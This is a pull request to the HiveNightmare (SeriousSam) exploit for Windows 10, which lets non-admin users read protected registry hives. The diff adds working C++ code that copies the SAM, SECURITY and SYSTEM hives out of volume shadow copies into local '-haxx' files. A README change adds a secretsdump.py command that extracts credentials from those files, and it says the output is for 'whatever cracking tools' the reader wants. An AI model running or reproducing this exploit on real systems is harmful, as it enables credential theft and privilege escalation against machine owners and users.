### PR TITLE
Add SYSTEM and SECURITY hives

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -361,3 +361,6 @@ MigrationBackup/
 
 # Fody - auto-generated XML schema
 FodyWeavers.xsd
+
+# CUSTOM
+*haxx

--- a/HiveNightmare/HiveNightmare.cpp
+++ b/HiveNightmare/HiveNightmare.cpp
@@ -10,6 +10,10 @@
 
 #include <windows.h>
 #include <stdio.h>
+#include <iostream>
+
+using std::endl;
+using std::cout;
 
 void main()
 {
@@ -36,8 +40,7 @@ void main()
 
                 if (hFile == INVALID_HANDLE_VALUE)
                 {
-                    printf("Could not open SAM :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows");
-                    return;
+                    printf("Could not open SAM :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows\n");
                 }
             }
         }
@@ -48,7 +51,7 @@ void main()
 
     if (hAppend == INVALID_HANDLE_VALUE)
     {
-        printf("Could not write SAM-haxx - permission issue rather than vulnerability issue, make sure you're running from a folder where you can write to");
+        printf("Could not write SAM-haxx - permission issue rather than vulnerability issue, make sure you're running from a folder where you can write to\n");
         return;
     }
 
@@ -70,5 +73,117 @@ void main()
     CloseHandle(hFile);
     CloseHandle(hAppend);
 
-    printf("Assuming no errors, Khajiit should find wares in SAM-haxx");
+    cout << "SAM hive written out to current working directory" << endl;
+
+    ///////////////////////////////////////////////
+    // UPDATE PART 1: READ IN THE SECURITY HIVE TOO
+    ///////////////////////////////////////////////
+    hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SECURITY"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    if (hFile == INVALID_HANDLE_VALUE)
+    {
+        hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\\config\\SECURITY"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+        if (hFile == INVALID_HANDLE_VALUE)
+        {
+            hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy3\\Windows\\System32\\config\\SECURITY"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+            if (hFile == INVALID_HANDLE_VALUE)
+            {
+                hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy4\\Windows\\System32\\config\\SECURITY"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+                if (hFile == INVALID_HANDLE_VALUE)
+                {
+                    printf("Could not open SECURITY :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows\n");
+                    
+                }
+            }
+        }
+    }
+
+
+    hAppend = CreateFile(TEXT("SECURITY-haxx"), FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    if (hAppend == INVALID_HANDLE_VALUE)
+    {
+        printf("Could not write SECURITY-haxx - permission issue rather than vulnerability issue, make sure you're running from a folder where you can write to");
+        return;
+    }
+
+    // Append the SECURITY file to the end of the second file.
+    // We should probably overwrite it really.
+
+
+    while (ReadFile(hFile, buff, sizeof(buff), &dwBytesRead, NULL)
+        && dwBytesRead > 0)
+    {
+        dwPos = SetFilePointer(hAppend, 0, NULL, FILE_END);
+        LockFile(hAppend, dwPos, 0, dwBytesRead, 0);
+        WriteFile(hAppend, buff, dwBytesRead, &dwBytesWritten, NULL);
+        UnlockFile(hAppend, dwPos, 0, dwBytesRead, 0);
+    }
+
+    // Safety first.
+
+    CloseHandle(hFile);
+    CloseHandle(hAppend);
+
+    cout << "SECURITY hive written out to current working directory" << endl;
+
+    ///////////////////////////////////////////////
+    // UPDATE PART 1: READ IN THE SYSTEM HIVE TOO
+    ///////////////////////////////////////////////
+    hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    if (hFile == INVALID_HANDLE_VALUE)
+    {
+        hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\System32\\config\\SYSTEM"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+        if (hFile == INVALID_HANDLE_VALUE)
+        {
+            hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy3\\Windows\\System32\\config\\SYSTEM"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+            if (hFile == INVALID_HANDLE_VALUE)
+            {
+                hFile = CreateFile(TEXT("\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy4\\Windows\\System32\\config\\SYSTEM"), GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+
+                if (hFile == INVALID_HANDLE_VALUE)
+                {
+                    printf("Could not open SYSTEM :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows\n");
+
+                }
+            }
+        }
+    }
+
+
+    hAppend = CreateFile(TEXT("SYSTEM-haxx"), FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    if (hAppend == INVALID_HANDLE_VALUE)
+    {
+        printf("Could not write SYSTEM-haxx - permission issue rather than vulnerability issue, make sure you're running from a folder where you can write to");
+        return;
+    }
+
+    // Append the SECURITY file to the end of the second file.
+    // We should probably overwrite it really.
+
+
+    while (ReadFile(hFile, buff, sizeof(buff), &dwBytesRead, NULL)
+        && dwBytesRead > 0)
+    {
+        dwPos = SetFilePointer(hAppend, 0, NULL, FILE_END);
+        LockFile(hAppend, dwPos, 0, dwBytesRead, 0);
+        WriteFile(hAppend, buff, dwBytesRead, &dwBytesWritten, NULL);
+        UnlockFile(hAppend, dwPos, 0, dwBytesRead, 0);
+    }
+
+    // Safety first.
+
+    CloseHandle(hFile);
+    CloseHandle(hAppend);
+
+    cout << "SYSTEM hive written out to current working directory" << endl;
+
+    cout << "Assuming no errors, should be able to find hive dump files in current working directory" << endl;
 }

--- a/HiveNightmare/HiveNightmare.vcxproj
+++ b/HiveNightmare/HiveNightmare.vcxproj
@@ -42,7 +42,7 @@
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
     <ConfigurationType>Application</ConfigurationType>
     <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v143</PlatformToolset>
+    <PlatformToolset>v142</PlatformToolset>
     <CharacterSet>Unicode</CharacterSet>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

--- a/README.md
+++ b/README.md
@@ -2,21 +2,29 @@
 aka SeriousSam.  Exploit allowing you to read any registry hives as non-admin.
 
 # What is this?
-An exploit for HiveNightmare, discovered by @jonasLyk, PoC by @GossiTheDog, powered by Porgs
+An exploit for HiveNightmare, discovered by @jonasLyk, PoC by @GossiTheDog, powered by Porgs.
+
+**Forked by @0xblacklight, and updated to include the SYSTEM and SECURITY hives**
 
 # Scope
 Appears to work on all supported versions of Windows 10, where System Protection is enabled (should be enabled by default in most configurations).
+May not work on Windows Server
 
 # How does this work?
 The permissions on key registry hives are set to allow all non-admin users to read the files by default, in most Windows 10 configurations.  This is an error.
 
 # What does the exploit do?
-Allows you to read SAM data (sensitive) in Windows 10.  
+Allows you to read SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives.
 
-This exploit uses VSC to extract the SAM even when in use, and saves the SAM in current directory as SAM-haxx, for use with whatever cracking tools, or whatever, you want.
+This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want.
+
+# Pulling Credentials out
+```
+python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL
+```
 
 # Bugs and issues
 - Currently only looks for the first four system recovery snapshots.
-- Haven't added support for dumping SECURITY, SYSTEM etc registry hives yet as I can't be bothered. 
+- ~~Haven't added support for dumping SECURITY, SYSTEM etc registry hives yet as I can't be bothered.~~
 
 ![Alt Image text](Capture.PNG?raw=true "PoC on Windows 10 21H1 as non-admin")


### PR DESCRIPTION
messy copy-pasting to add reading the `SYSTEM` and `SECURITY` hives and writing them out to disk, as well as instructions in the README on how to use `secretsdump.py` to crack them